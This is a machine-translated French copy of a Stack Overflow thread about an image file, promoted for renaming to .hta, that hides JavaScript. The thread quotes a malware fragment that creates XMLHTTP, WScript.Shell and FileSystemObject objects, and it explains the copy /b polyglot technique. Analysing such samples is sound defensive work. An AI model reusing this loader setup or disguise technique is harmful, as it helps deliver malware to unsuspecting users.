Intégration Javascript dans un fichier d'image
https://stackoverflow.com/questions/3435422
-
26-09-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianQuestion
Je l'ai remarqué une nouvelle tendance dans la distribution du code potentiellement dangereux où les gens affichera une image sur un serveur avec un filigrane qui suggère qu'ils changer le nom du fichier pour avoir une extension de fichier .hta.
Je compris que .hta était un fichier d'application HTML, qui sont implicitement approuvé par la logique de Microsoft et peut contenir du code pour faire à peu près tout sur le Web. J'ai ouvert le fichier avec mon éditeur de texte préféré et à ma grande surprise il y avait un code Javascript dans le fichier image!
jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV
//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
Il est plus indéchiffrable des données d'image ci-dessous le code source ainsi. Ceci est juste un extrait.
Je suis très curieux de savoir comment ils ont pu ajouter le code Javascript dans un fichier d'image sans altérer le format de fichier d'image et d'en faire unviewable. J'ai présenté ce à certains de mes collègues, et ils étaient tout aussi perplexe.
La solution
Je pense que cela est un fichier multipart de quelque sorte (pour lequel il serait parfaitement bien contenir à la fois des images et des données de script), qui obtient peut-être loin exécuté directement (dans un contexte local) parce qu'il est traité comme un Hypertext application.
Pour plus d'informations, nous aurions besoin de voir le dossier complet réel.
Autres conseils
Le problème ici est des tolérances libérales de format de fichier.
L'interpréteur de JPG est assez indulgent pour ignorer « corrompu » des données non-image. Voilà comment vous pouvez voir un grand JPG alors qu'il est encore le téléchargement. L'interprète HTA est assez indulgent pour ignorer tout le bizarre « texte » en haut du dossier et procéder à évaluer les choses qui ressemble balisage et script ci-dessous.
Il y a un autre message sur ce comportement curieux ici: Puis-je intégrer une icône dans un fichier .hta? Dans ce Alexandre Jasmine suggère l'incorporation d'une icône dans une HTA avec cette ligne de commande:
copy /b icon.ico+source.hta iconapp.hta
L'image / script que vous avez trouvé aurait pu être créée à l'aide de cette technique.
Vous ne comprend pas le script entier, mais ce que vous montrez semble assez effrayant. Un script HTA avec une connexion web, shell et objet système de fichiers peut faire ce qu'il veut avec votre système de fichiers local, puis téléphone à la maison une fois qu'il est fait.
